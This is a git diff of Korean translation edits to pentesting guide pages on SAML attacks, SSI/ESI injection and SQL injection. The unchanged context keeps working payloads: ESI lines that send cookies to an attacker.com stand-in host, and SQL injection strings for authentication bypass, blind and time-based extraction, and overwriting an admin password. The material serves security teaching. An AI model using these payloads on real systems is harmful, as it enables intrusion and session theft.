-4. Burp의 프록시에서 가로챈 요청으로 돌아갑니다. XML Signature 드롭다운에서 새 자체 서명된 인증서를 선택합니다.
+3. SAML Raider 인증서 탭에서 가져온 인증서를 선택하고 `Save and Self-Sign`을 클릭하여 원래 인증서의 자체 서명된 복제본을 생성합니다.
+4. Burp의 프록시에서 가로챈 요청으로 돌아갑니다. XML 서명 드롭다운에서 새 자체 서명된 인증서를 선택합니다.
 5. `Remove Signatures` 버튼을 사용하여 기존 서명을 제거합니다.
 6. 적절한 경우 **`(Re-)Sign Message`** 또는 **`(Re-)Sign Assertion`** 버튼을 사용하여 새 인증서로 메시지 또는 주장을 서명합니다.
-7. 서명된 메시지를 전달합니다. 성공적인 인증은 SP가 자체 서명된 인증서로 서명된 메시지를 수락함을 나타내며, SAML 메시지의 검증 프로세스에서 잠재적인 취약점을 드러냅니다.
+7. 서명된 메시지를 전달합니다. 성공적인 인증은 SP가 귀하의 자체 서명된 인증서로 서명된 메시지를 수락함을 나타내며, SAML 메시지의 검증 프로세스에서 잠재적인 취약점을 드러냅니다.
 
-## Token Recipient Confusion / Service Provider Target Confusion <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
+## 토큰 수신자 혼동 / 서비스 제공자 대상 혼동 <a href="#token-recipient-confusion" id="token-recipient-confusion"></a>
 
-Token Recipient Confusion 및 Service Provider Target Confusion은 **서비스 제공자가 응답의 의도된 수신자를 올바르게 검증하는지 확인하는 것**을 포함합니다. 본질적으로, 서비스 제공자는 다른 제공자를 위해 의도된 경우 인증 응답을 거부해야 합니다. 여기서 중요한 요소는 SAML 응답의 **SubjectConfirmationData** 요소 내에 있는 **Recipient** 필드입니다. 이 필드는 Assertion이 전송되어야 하는 URL을 지정합니다. 실제 수신자가 의도된 서비스 제공자와 일치하지 않으면 Assertion은 유효하지 않은 것으로 간주되어야 합니다.
+토큰 수신자 혼동 및 서비스 제공자 대상 혼동은 **서비스 제공자가 응답의 의도된 수신자를 올바르게 검증하는지 확인하는 것**을 포함합니다. 본질적으로, 서비스 제공자는 다른 제공자를 위해 의도된 경우 인증 응답을 거부해야 합니다. 여기서 중요한 요소는 SAML 응답의 **SubjectConfirmationData** 요소 내에 있는 **Recipient** 필드입니다. 이 필드는 주장이 전송되어야 하는 URL을 지정합니다. 실제 수신자가 의도된 서비스 제공자와 일치하지 않으면 주장은 유효하지 않은 것으로 간주되어야 합니다.
 
-#### **How It Works**
+#### **작동 방식**
 
-SAML Token Recipient Confusion (SAML-TRC) 공격이 가능하려면 특정 조건이 충족되어야 합니다. 첫째, 서비스 제공자(SP-Legit)에 유효한 계정이 있어야 합니다. 둘째, 타겟 서비스 제공자(SP-Target)는 SP-Legit에 서비스를 제공하는 동일한 ID 공급자로부터 토큰을 수락해야 합니다.
+SAML 토큰 수신자 혼동(SAML-TRC) 공격이 가능하려면 특정 조건이 충족되어야 합니다. 첫째, 서비스 제공자(SP-Legit)에 유효한 계정이 있어야 합니다. 둘째, 목표 서비스 제공자(SP-Target)는 SP-Legit에 서비스를 제공하는 동일한 ID 공급자로부터 토큰을 수락해야 합니다.
 
-이러한 조건 하에서 공격 프로세스는 간단합니다. 공유된 ID 공급자를 통해 SP-Legit와의 인증 세션이 시작됩니다. ID 공급자로부터 SP-Legit으로의 SAML 응답이 가로채집니다. 이 가로챈 SAML 응답은 원래 SP-Legit을 위해 의도된 것이며, SP-Target으로 리디렉션됩니다. 이 공격의 성공은 SP-Target이 Assertion을 수락하여 SP-Legit에 사용된 동일한 계정 이름으로 리소스에 접근할 수 있도록 하는 것입니다.
+이러한 조건에서 공격 프로세스는 간단합니다. 공유 ID 공급자를 통해 SP-Legit와의 인증 세션이 시작됩니다. ID 공급자로부터 SP-Legit으로의 SAML 응답이 가로채집니다. 이 가로챈 SAML 응답은 원래 SP-Legit을 위해 의도된 것이며, SP-Target으로 리디렉션됩니다. 이 공격의 성공은 SP-Target이 주장을 수락하여 SP-Legit에 사용된 동일한 계정 이름으로 리소스에 대한 접근을 허용하는지에 의해 측정됩니다.
 ```python
 # Example to simulate interception and redirection of SAML Response
 def intercept_and_redirect_saml_response(saml_response, sp_target_url):
@@ -262,7 +262,7 @@ https://carbon-prototype.uberinternal.com/oidauth/prompt?base=https%3A%2F%2Fcarb
 
 [이 연구에서](https://blog.fadyothman.com/how-i-discovered-xss-that-affects-over-20-uber-subdomains/):
 
-[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) 도구는 동일한 라이브러리를 사용하는 도메인에 대해 `uberinternal.com`의 하위 도메인을 분석하는 데 사용되었습니다. 이후 `oidauth/prompt` 페이지를 타겟으로 하는 스크립트가 개발되었습니다. 이 스크립트는 데이터를 입력하고 출력에 반영되는지 확인하여 XSS (교차 사이트 스크립팅)를 테스트합니다. 입력이 실제로 반영되는 경우, 스크립트는 해당 페이지를 취약하다고 표시합니다.
+[**SAMLExtractor**](https://github.com/fadyosman/SAMLExtractor) 도구가 동일한 라이브러리를 사용하는 `uberinternal.com`의 서브 도메인을 분석하는 데 사용되었습니다. 이후 `oidauth/prompt` 페이지를 타겟으로 하는 스크립트가 개발되었습니다. 이 스크립트는 데이터를 입력하고 출력에 반영되는지 확인하여 XSS (교차 사이트 스크립팅)를 테스트합니다. 입력이 실제로 반영되는 경우, 스크립트는 해당 페이지를 취약하다고 표시합니다.
 ```python
 import requests
 import urllib3
diff --git a/src/pentesting-web/saml-attacks/saml-basics.md b/src/pentesting-web/saml-attacks/saml-basics.md
index 4f01b6809..9a33061df 100644
--- a/src/pentesting-web/saml-attacks/saml-basics.md
+++ b/src/pentesting-web/saml-attacks/saml-basics.md
@@ -2,7 +2,7 @@
 
 # SAML 개요
 
-**Security Assertion Markup Language (SAML)**는 신원 제공자(IdP)가 서비스 제공자(SP)에게 권한 부여 자격 증명을 전송할 수 있도록 하여 단일 로그인(SSO)을 촉진합니다. 이 접근 방식은 여러 웹사이트에서 단일 자격 증명을 사용할 수 있게 하여 여러 로그인 관리를 간소화합니다. IdP와 SP 간의 표준화된 통신을 위해 XML을 활용하며, 사용자 신원의 인증과 서비스 권한 부여를 연결합니다.
+**Security Assertion Markup Language (SAML)**는 아이덴티티 제공자(IdP)가 서비스 제공자(SP)에게 권한 부여 자격 증명을 전송할 수 있도록 하여 단일 로그인(SSO)을 촉진합니다. 이 접근 방식은 여러 웹사이트에서 단일 자격 증명을 사용할 수 있도록 하여 여러 로그인 관리를 간소화합니다. IdP와 SP 간의 표준화된 통신을 위해 XML을 활용하며, 사용자 신원의 인증과 서비스 권한 부여를 연결합니다.
 
 ## SAML과 OAuth 비교
 
@@ -13,7 +13,7 @@
 
 **자세한 내용은 [https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/](https://epi052.gitlab.io/notes-to-self/blog/2019-03-07-how-to-test-saml-a-methodology/)의 전체 게시물을 확인하세요.** 다음은 요약입니다:
 
-SAML 인증 프로세스는 여러 단계로 구성되어 있으며, 아래의 도식에서 설명됩니다:
+SAML 인증 프로세스는 여러 단계로 구성되어 있으며, 스키마에 설명되어 있습니다:
 
 ![https://epi052.gitlab.io/notes-to-self/img/saml/saml-flow.jpg](https://epi052.gitlab.io/notes-to-self/img/saml/saml-flow.jpg)
 
@@ -47,9 +47,9 @@ Host: shibdemo-sp1.test.edu
 - **AssertionConsumerServiceURL**: IdP가 인증 후 SAML 응답을 보낼 위치를 지정합니다.
 - **Destination**: 요청이 전송되는 IdP의 주소입니다.
 - **ProtocolBinding**: SAML 프로토콜 메시지의 전송 방법을 정의합니다.
-- **saml:Issuer**: 요청을 시작한 엔티티를 식별합니다.
+- **saml:Issuer**: 요청을 시작한 엔터티를 식별합니다.
 
-SAML 요청 생성 후, SP는 **302 redirect**로 응답하여 브라우저를 SAML 요청이 HTTP 응답의 **Location** 헤더에 인코딩된 IdP로 안내합니다. **RelayState** 매개변수는 거래 전반에 걸쳐 상태 정보를 유지하여 SP가 SAML 응답을 수신할 때 초기 리소스 요청을 인식하도록 합니다. **SAMLRequest** 매개변수는 원시 XML 스니펫의 압축 및 인코딩된 버전으로, Deflate 압축 및 base64 인코딩을 사용합니다.
+SAML 요청 생성 후, SP는 **302 redirect**로 응답하여 브라우저를 SAML 요청이 HTTP 응답의 **Location** 헤더에 인코딩된 IdP로 안내합니다. **RelayState** 매개변수는 거래 전반에 걸쳐 상태 정보를 유지하여 SP가 SAML 응답을 수신할 때 초기 리소스 요청을 인식하도록 합니다. **SAMLRequest** 매개변수는 원시 XML 조각의 압축 및 인코딩된 버전으로, Deflate 압축 및 base64 인코딩을 사용합니다.
 
 # SAML 응답 예시
 
@@ -63,9 +63,9 @@ SAML 요청 생성 후, SP는 **302 redirect**로 응답하여 브라우저를 S
 - **saml:AuthnStatement**: IdP가 어설션의 주체를 인증했음을 확인합니다.
 - **saml:AttributeStatement**: 어설션의 주체를 설명하는 속성을 포함합니다.
 
-SAML 응답 후, 프로세스에는 IdP로부터의 302 리디렉션이 포함됩니다. 이는 서비스 제공자의 어설션 소비자 서비스(ACS) URL로의 POST 요청으로 이어집니다. POST 요청에는 `RelayState` 및 `SAMLResponse` 매개변수가 포함됩니다. ACS는 SAML 응답을 처리하고 검증하는 책임이 있습니다.
+SAML 응답 후, IdP에서 302 redirect가 포함된 프로세스가 진행됩니다. 이는 서비스 제공자의 어설션 소비자 서비스(ACS) URL로의 POST 요청으로 이어집니다. POST 요청에는 `RelayState` 및 `SAMLResponse` 매개변수가 포함됩니다. ACS는 SAML 응답을 처리하고 검증하는 역할을 합니다.
 
-POST 요청이 수신되고 SAML 응답이 검증된 후, 사용자가 처음 요청한 보호된 리소스에 대한 접근이 허용됩니다. 이는 `/secure/` 엔드포인트에 대한 `GET` 요청과 성공적인 리소스 접근을 나타내는 `200 OK` 응답으로 설명됩니다.
+POST 요청이 수신되고 SAML 응답이 검증된 후, 사용자가 처음 요청한 보호된 리소스에 대한 접근이 허용됩니다. 이는 `/secure/` 엔드포인트에 대한 `GET` 요청과 리소스에 대한 성공적인 접근을 나타내는 `200 OK` 응답으로 설명됩니다.
 
 # XML 서명
 
@@ -73,7 +73,7 @@ XML 서명은 전체 XML 트리 또는 그 안의 특정 요소에 서명할 수
 
 ### XML 서명의 기본 구조
 
-XML 서명은 다음과 같은 필수 요소로 구성됩니다:
+XML 서명은 필수 요소로 구성됩니다:
 ```xml
 <Signature>
 <SignedInfo>
@@ -95,7 +95,7 @@ XML 서명은 다음과 같은 필수 요소로 구성됩니다:
 
 ### XML 서명의 유형
 
-1. **Enveloped Signature**: 이 유형의 서명은 서명하는 리소스의 자손으로, 서명이 서명된 콘텐츠와 동일한 XML 구조 내에 포함되어 있음을 의미합니다.
+1. **Enveloped Signature**: 이 유형의 서명은 서명된 리소스의 자손으로, 서명이 서명된 콘텐츠와 동일한 XML 구조 내에 포함되어 있음을 의미합니다.
 
 예시:
 
@@ -114,9 +114,9 @@ XML 서명은 다음과 같은 필수 요소로 구성됩니다:
 </samlp:Response>
 ```
 
-Enveloped 서명에서 `ds:Transform` 요소는 `enveloped-signature` 알고리즘을 통해 서명되어 있음을 지정합니다.
+enveloped 서명에서 `ds:Transform` 요소는 `enveloped-signature` 알고리즘을 통해 enveloped됨을 지정합니다.
 
-2. **Enveloping Signature**: Enveloped 서명과 대조적으로, enveloping 서명은 서명되는 리소스를 감쌉니다.
+2. **Enveloping Signature**: enveloped 서명과 대조적으로, enveloping 서명은 서명되는 리소스를 감쌉니다.
 
 예시:
 
diff --git a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
index f5c9d6882..f45f80ffe 100644
--- a/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
+++ b/src/pentesting-web/server-side-inclusion-edge-side-inclusion-injection.md
@@ -6,7 +6,7 @@
 
 **(소개는** [**Apache 문서**](https://httpd.apache.org/docs/current/howto/ssi.html)**에서 가져옴)**
 
-SSI (서버 사이드 포함)는 **HTML 페이지에 배치되고, 페이지가 제공되는 동안 서버에서 평가되는 지시어**입니다. 이를 통해 **기존 HTML 페이지에 동적으로 생성된 콘텐츠**를 추가할 수 있으며, 전체 페이지를 CGI 프로그램이나 다른 동적 기술을 통해 제공할 필요가 없습니다.\
+SSI(서버 사이드 포함)는 **HTML 페이지에 배치되고, 페이지가 제공되는 동안 서버에서 평가되는 지시어**입니다. 이를 통해 **기존 HTML 페이지에 동적으로 생성된 콘텐츠**를 추가할 수 있으며, 전체 페이지를 CGI 프로그램이나 다른 동적 기술을 통해 제공할 필요가 없습니다.\
 예를 들어, 기존 HTML 페이지에 다음과 같은 지시어를 배치할 수 있습니다:
 
 `<!--#echo var="DATE_LOCAL" -->`
@@ -15,11 +15,11 @@ SSI (서버 사이드 포함)는 **HTML 페이지에 배치되고, 페이지가
 
 `Tuesday, 15-Jan-2013 19:28:54 EST`
 
-SSI를 사용할 시점과 페이지를 완전히 생성할 프로그램을 선택하는 것은 일반적으로 페이지의 정적 부분과 페이지가 제공될 때마다 재계산해야 하는 부분의 양에 따라 달라집니다. SSI는 위에 표시된 현재 시간과 같은 작은 정보를 추가하는 훌륭한 방법입니다. 그러나 페이지의 대부분이 제공될 때 생성된다면, 다른 해결책을 찾아야 합니다.
+SSI를 사용할 시점과 페이지를 완전히 프로그램에 의해 생성할 시점의 결정은 일반적으로 페이지의 정적 부분과 페이지가 제공될 때마다 재계산해야 하는 부분의 양에 따라 달라집니다. SSI는 위에 표시된 현재 시간과 같은 작은 정보 조각을 추가하는 훌륭한 방법입니다. 그러나 페이지의 대부분이 제공될 때 생성되는 경우, 다른 솔루션을 찾아야 합니다.
 
 웹 애플리케이션이 확장자가 **`.shtml`, `.shtm` 또는 `.stm`**인 파일을 사용하는 경우 SSI의 존재를 추론할 수 있지만, 그것만이 전부는 아닙니다.
 
-전형적인 SSI 표현은 다음 형식을 가집니다:
+전형적인 SSI 표현식은 다음 형식을 가집니다:
 ```
 <!--#directive param="value" -->
 ```
@@ -89,7 +89,7 @@ hell<!--esi-->o
 ```
 ### ESI 취약점
 
-[GoSecure는](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) 다양한 ESI 지원 소프트웨어에 대해 시도할 수 있는 가능한 공격을 이해하기 위한 표를 작성했습니다. 이는 지원되는 기능에 따라 다릅니다:
+[GoSecure는](https://www.gosecure.net/blog/2018/04/03/beyond-xss-edge-side-include-injection/) 다양한 ESI 지원 소프트웨어에 대해 시도할 수 있는 가능한 공격을 이해하기 위한 표를 만들었습니다. 이는 지원되는 기능에 따라 다릅니다:
 
 - **Includes**: `<esi:includes>` 지시어를 지원합니다.
 - **Vars**: `<esi:vars>` 지시어를 지원합니다. XSS 필터를 우회하는 데 유용합니다.
@@ -127,7 +127,7 @@ Use <!--esi--> to bypass WAFs:
 <esi:include src=http://attacker.com/$(HTTP_COOKIE)>
 <esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />
 ```
-- XSS를 사용하여 응답에 반영하여 HTTP_ONLY 쿠키를 탈취하기:
+- XSS를 사용하여 응답에 반영하여 HTTP_ONLY 쿠키를 훔치기:
 ```bash
 # This will reflect the cookies in the response
 <!--esi $(HTTP_COOKIE) -->
@@ -175,9 +175,9 @@ Use <!--esi--> to bypass WAFs:
 Host: anotherhost.com"/>
 </esi:include>
 ```
-#### Akamai debug
+#### Akamai 디버그
 
-이것은 응답에 포함된 디버그 정보를 보냅니다:
+이것은 응답에 포함된 디버그 정보를 보낼 것입니다:
 ```xml
 <esi:debug/>
 ```
diff --git a/src/pentesting-web/sql-injection/README.md b/src/pentesting-web/sql-injection/README.md
index 7488b06df..91d12dcc6 100644
--- a/src/pentesting-web/sql-injection/README.md
+++ b/src/pentesting-web/sql-injection/README.md
@@ -4,7 +4,7 @@
 
 ## SQL 인젝션이란 무엇인가?
 
-**SQL 인젝션**은 공격자가 애플리케이션의 **데이터베이스 쿼리**에 **간섭할 수 있게 해주는** 보안 결함입니다. 이 취약점은 공격자가 접근해서는 안 되는 데이터, 즉 다른 사용자의 정보나 애플리케이션이 접근할 수 있는 모든 데이터를 **조회**, **수정**, 또는 **삭제**할 수 있게 합니다. 이러한 행동은 애플리케이션의 기능이나 콘텐츠에 영구적인 변경을 초래하거나 서버의 손상 또는 서비스 거부를 초래할 수 있습니다.
+**SQL 인젝션**은 공격자가 애플리케이션의 **데이터베이스 쿼리**에 **간섭할 수 있게 해주는** 보안 결함입니다. 이 취약점은 공격자가 접근해서는 안 되는 데이터, 즉 다른 사용자의 정보나 애플리케이션이 접근할 수 있는 모든 데이터를 **조회**, **수정**, 또는 **삭제**할 수 있게 합니다. 이러한 행동은 애플리케이션의 기능이나 콘텐츠에 영구적인 변화를 초래하거나 서버의 손상 또는 서비스 거부를 초래할 수 있습니다.
 
 ## 진입점 탐지
 
@@ -21,7 +21,7 @@
 "))
 `))
 ```
-그렇다면 **오류가 없도록 쿼리를 수정하는 방법**을 알아야 합니다. 쿼리를 수정하기 위해 **데이터를 입력**하여 **이전 쿼리가 새 데이터를 수용하도록** 하거나, 그냥 **데이터를 입력하고 끝에 주석 기호를 추가**할 수 있습니다.
+그렇다면 **오류가 없도록 쿼리를 수정하는 방법**을 알아야 합니다. 쿼리를 수정하기 위해 **데이터를 입력**하여 **이전 쿼리가 새 데이터를 수용하도록** 하거나, 그냥 **데이터를 입력**하고 **끝에 주석 기호를 추가**할 수 있습니다.
 
 _쿼리가 작동할 때와 작동하지 않을 때 오류 메시지를 볼 수 있거나 차이점을 발견할 수 있다면 이 단계는 더 쉬울 것입니다._
 
@@ -53,9 +53,9 @@ HQL does not support comments
 ```
 ### 논리 연산으로 확인하기
 
-SQL 인젝션 취약점을 확인하는 신뢰할 수 있는 방법은 **논리 연산**을 실행하고 예상 결과를 관찰하는 것입니다. 예를 들어, `?username=Peter`와 같은 GET 매개변수가 `?username=Peter' or '1'='1`로 수정했을 때 동일한 콘텐츠를 생성하면 SQL 인젝션 취약점이 있음을 나타냅니다.
+SQL 인젝션 취약성을 확인하는 신뢰할 수 있는 방법은 **논리 연산**을 실행하고 예상 결과를 관찰하는 것입니다. 예를 들어, `?username=Peter`와 같은 GET 매개변수를 `?username=Peter' or '1'='1`로 수정했을 때 동일한 콘텐츠가 생성되면 SQL 인젝션 취약성이 있음을 나타냅니다.
 
-마찬가지로, **수학적 연산**의 적용은 효과적인 확인 기술로 작용합니다. 예를 들어, `?id=1`과 `?id=2-1`에 접근했을 때 동일한 결과가 나온다면, 이는 SQL 인젝션을 나타냅니다.
+마찬가지로, **수학적 연산**의 적용은 효과적인 확인 기술로 작용합니다. 예를 들어, `?id=1`과 `?id=2-1`에 접근했을 때 동일한 결과가 생성되면 SQL 인젝션을 나타냅니다.
 
 논리 연산 확인을 보여주는 예:
 ```
@@ -70,7 +70,7 @@ page.asp?id=1 and 1=2 -- results in false
 
 ### 타이밍으로 확인하기
 
-일부 경우에는 테스트 중인 페이지에서 **변화를 감지하지 못할 수 있습니다**. 따라서 **블라인드 SQL 인젝션을 발견하는** 좋은 방법은 DB가 작업을 수행하게 하여 페이지 로드에 **영향을 미치는 시간**을 만드는 것입니다.\
+일부 경우에는 테스트 중인 페이지에서 **변화를 감지하지 못할 수 있습니다**. 따라서 **블라인드 SQL 인젝션을 발견하는** 좋은 방법은 DB가 작업을 수행하게 하여 페이지 로드에 **시간에 영향을 미치게 하는** 것입니다.\
 따라서 SQL 쿼리에 완료하는 데 많은 시간이 걸리는 작업을 연결할 것입니다:
 ```
 MySQL (string concat and logical ops)
@@ -97,7 +97,7 @@ SQLite
 
 ### 백엔드 식별
 
-백엔드를 식별하는 가장 좋은 방법은 다양한 백엔드의 함수를 실행해보는 것입니다. 이전 섹션의 _**sleep**_ **함수** 또는 다음의 함수들을 사용할 수 있습니다 (표는 [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification)에서):
+백엔드를 식별하는 가장 좋은 방법은 다양한 백엔드의 함수를 실행해보는 것입니다. 이전 섹션의 _**sleep**_ **함수** 또는 다음의 함수들을 사용할 수 있습니다 (table from [payloadsallthethings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification):
 ```bash
 ["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
 ["connection_id()=connection_id()"                 ,"MYSQL"],
@@ -138,8 +138,8 @@ SQLite
 
 ### 열의 수 감지
 
-쿼리의 출력을 볼 수 있다면, 이것이 가장 좋은 방법입니다.\
-우선, **초기 요청**이 반환하는 **열**의 **수**를 찾아야 합니다. 이는 **두 쿼리가 동일한 수의 열을 반환해야 하기 때문**입니다.\
+쿼리의 출력을 볼 수 있다면, 이것이 가장 좋은 악용 방법입니다.\
+우선, **초기 요청**이 반환하는 **열의 수**를 알아내야 합니다. 이는 **두 쿼리가 동일한 수의 열을 반환해야 하기 때문**입니다.\
 이 목적을 위해 일반적으로 두 가지 방법이 사용됩니다:
 
 #### Order/Group by
@@ -187,7 +187,7 @@ _모든 데이터베이스에서 이 데이터를 발견하는 방법은 다르
 
 ## 숨겨진 유니온 기반 활용
 
-쿼리의 출력이 보이지만 유니온 기반 주입이 불가능해 보일 때, 이는 **숨겨진 유니온 기반 주입**의 존재를 나타냅니다. 이 시나리오는 종종 블라인드 주입 상황으로 이어집니다. 블라인드 주입을 유니온 기반으로 변환하려면 백엔드에서 실행 쿼리를 식별해야 합니다.
+쿼리의 출력이 보이지만 유니온 기반 주입이 불가능해 보일 때, 이는 **숨겨진 유니온 기반 주입**의 존재를 의미합니다. 이 시나리오는 종종 블라인드 주입 상황으로 이어집니다. 블라인드 주입을 유니온 기반으로 변환하려면 백엔드에서 실행 쿼리를 파악해야 합니다.
 
 이는 블라인드 주입 기술과 대상 데이터베이스 관리 시스템(DBMS)에 특정한 기본 테이블을 사용하여 수행할 수 있습니다. 이러한 기본 테이블을 이해하기 위해서는 대상 DBMS의 문서를 참조하는 것이 좋습니다.
 
@@ -205,7 +205,7 @@ _모든 데이터베이스에서 이 데이터를 발견하는 방법은 다르
 ## 블라인드 SQLi 활용하기
 
 이 경우 쿼리의 결과나 오류를 볼 수는 없지만, 쿼리가 **true** 또는 **false** 응답을 **반환**할 때 페이지의 내용이 다르기 때문에 이를 **구별**할 수 있습니다.\
-이 경우, 이 동작을 악용하여 데이터베이스를 문자 단위로 덤프할 수 있습니다:
+이 경우, 그 행동을 악용하여 데이터베이스를 문자 단위로 덤프할 수 있습니다:
 ```sql
 ?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
 ```
@@ -217,7 +217,7 @@ AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
 ```
 ## 시간 기반 SQLi 활용
 
-이 경우에는 페이지의 맥락에 따라 쿼리의 **응답**을 **구별**할 수 있는 방법이 **없습니다**. 그러나 추측한 문자가 올바른 경우 페이지가 **더 오래 로드되도록** 만들 수 있습니다. 우리는 이미 [SQLi 취약점 확인](./#confirming-with-timing)에서 이 기술이 사용되는 것을 보았습니다.
+이 경우에는 페이지의 맥락에 따라 쿼리의 **응답**을 **구분**할 수 있는 방법이 **없습니다**. 하지만, 추측한 문자가 맞으면 페이지가 **더 오래 로드되도록** 만들 수 있습니다. 우리는 이미 [타이밍을 통한 확인](./#confirming-with-timing)에서 이 기술이 사용되는 것을 보았습니다.
 ```sql
 1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
 ```
@@ -251,7 +251,7 @@ SQL Injection 취약점을 익스플로잇하는 모든 방법에 대해 이미
 - [Oracle](oracle-injection.md)
 - [PostgreSQL](postgresql-injection/)
 
-또한 **MySQL, PostgreSQL, Oracle, MSSQL, SQLite 및 HQL에 관한 많은 트릭을** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)에서 찾을 수 있습니다.
+또는 [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)에서 **MySQL, PostgreSQL, Oracle, MSSQL, SQLite 및 HQL에 관한 많은 트릭을 찾을 수 있습니다.**
 
 ## 인증 우회
 
@@ -265,7 +265,7 @@ SQL Injection 취약점을 익스플로잇하는 모든 방법에 대해 이미
 ```sql
 "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
 ```
-이 쿼리는 인증 검사에서 원시 출력을 위해 true로 MD5를 사용할 때 취약점을 보여줍니다. 이로 인해 시스템이 SQL 인젝션에 취약해집니다. 공격자는 해시될 때 예상치 못한 SQL 명령 부분을 생성하는 입력을 조작하여 무단 접근을 할 수 있습니다.
+이 쿼리는 인증 검사에서 원시 출력을 위해 true로 MD5를 사용할 때 취약점을 보여줍니다. 이로 인해 시스템이 SQL 인젝션에 취약해집니다. 공격자는 해시될 때 예상치 못한 SQL 명령 부분을 생성하는 입력을 조작하여 이를 악용할 수 있으며, 이로 인해 무단 접근이 발생할 수 있습니다.
 ```sql
 md5("ffifdyop", true) = 'or'6�]��!r,��b�
 sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!
@@ -310,13 +310,13 @@ SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
 
 - 이름이 **AdMIn**인 사용자 생성 (대문자 및 소문자 혼합)
 - 이름이 **admin=**인 사용자 생성
-- **SQL Truncation Attack** (사용자 이름이나 이메일에 **길이 제한**이 있을 때) --> 이름이 **admin \[공백이 많이 있는] a**인 사용자 생성
+- **SQL Truncation Attack** (사용자 이름이나 이메일에 **길이 제한**이 있을 때) --> 이름이 **admin \[공백이 많음] a**인 사용자 생성
 
 #### SQL Truncation Attack
 
-데이터베이스가 취약하고 사용자 이름의 최대 문자 수가 예를 들어 30일 때, **admin** 사용자를 가장하고 싶다면, "_admin \[30 공백] a_"라는 사용자 이름을 생성해 보십시오. 그리고 아무 비밀번호나 입력합니다.
+데이터베이스가 취약하고 사용자 이름의 최대 문자 수가 예를 들어 30일 때, **admin** 사용자를 가장하려면: "_admin \[30 공백] a_"라는 사용자 이름을 생성해 보십시오. 그리고 아무 비밀번호나 사용하십시오.
 
-데이터베이스는 입력된 **사용자 이름**이 데이터베이스에 **존재하는지** **확인**합니다. 만약 **존재하지 않으면**, **사용자 이름**을 **허용된 최대 문자 수**로 **잘라냅니다** (이 경우 "_admin \[25 공백]_"로) 그리고 **자동으로 끝의 모든 공백을 제거하여** 데이터베이스 내에서 사용자 "**admin**"의 **새 비밀번호**로 업데이트합니다 (어떤 오류가 발생할 수 있지만, 이는 작동하지 않았다는 것을 의미하지 않습니다).
+데이터베이스는 입력된 **사용자 이름**이 데이터베이스에 **존재하는지** **확인**합니다. **존재하지 않으면**, **사용자 이름**을 **최대 허용 문자 수**로 **잘라냅니다** (이 경우 "_admin \[25 공백]_"로) 그리고 데이터베이스 내에서 사용자 "**admin**"의 **새 비밀번호**로 **자동으로 모든 공백을 제거합니다** (어떤 오류가 발생할 수 있지만, 이것이 작동하지 않았다는 의미는 아닙니다).
 
 자세한 정보: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)
 
@@ -324,7 +324,7 @@ _참고: 이 공격은 최신 MySQL 설치에서 위와 같이 더 이상 작동
 
 ### MySQL Insert 시간 기반 검사
 
-`','',''`를 가능한 한 많이 추가하여 VALUES 문을 종료합니다. 지연이 발생하면 SQLInjection이 있는 것입니다.
+`','',''`를 가능한 한 많이 추가하여 VALUES 문을 종료하십시오. 지연이 발생하면 SQLInjection이 있습니다.
 ```sql
 name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
 ```
@@ -340,15 +340,15 @@ INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_
 ```
 다음은 작동 방식입니다:
 
-- 쿼리는 두 개의 행을 삽입하려고 시도합니다: 하나는 `generic_user@example.com`을 위한 것이고, 다른 하나는 `admin_generic@example.com`을 위한 것입니다.
-- 만약 `admin_generic@example.com`에 대한 행이 이미 존재한다면, `ON DUPLICATE KEY UPDATE` 절이 트리거되어 MySQL에 기존 행의 `password` 필드를 "bcrypt_hash_of_newpassword"로 업데이트하도록 지시합니다.
-- 따라서 인증은 `admin_generic@example.com`을 사용하여 bcrypt 해시에 해당하는 비밀번호로 시도할 수 있습니다 ("bcrypt_hash_of_newpassword"는 새 비밀번호의 bcrypt 해시를 나타내며, 원하는 비밀번호의 실제 해시로 대체되어야 합니다).
+- 쿼리는 `generic_user@example.com`에 대한 행과 `admin_generic@example.com`에 대한 행을 삽입하려고 시도합니다.
+- `admin_generic@example.com`에 대한 행이 이미 존재하는 경우, `ON DUPLICATE KEY UPDATE` 절이 트리거되어 MySQL에 기존 행의 `password` 필드를 "bcrypt_hash_of_newpassword"로 업데이트하도록 지시합니다.
+- 따라서 `admin_generic@example.com`을 사용하여 bcrypt 해시에 해당하는 비밀번호로 인증을 시도할 수 있습니다 ("bcrypt_hash_of_newpassword"는 새 비밀번호의 bcrypt 해시를 나타내며, 원하는 비밀번호의 실제 해시로 대체되어야 합니다).
 
 ### 정보 추출
 
 #### 동시에 2개의 계정 만들기
 
-새로운 사용자와 사용자 이름을 만들려고 할 때, 비밀번호와 이메일이 필요합니다:
+새 사용자와 사용자 이름을 만들려고 할 때 비밀번호와 이메일이 필요합니다:
 ```
 SQLi payload:
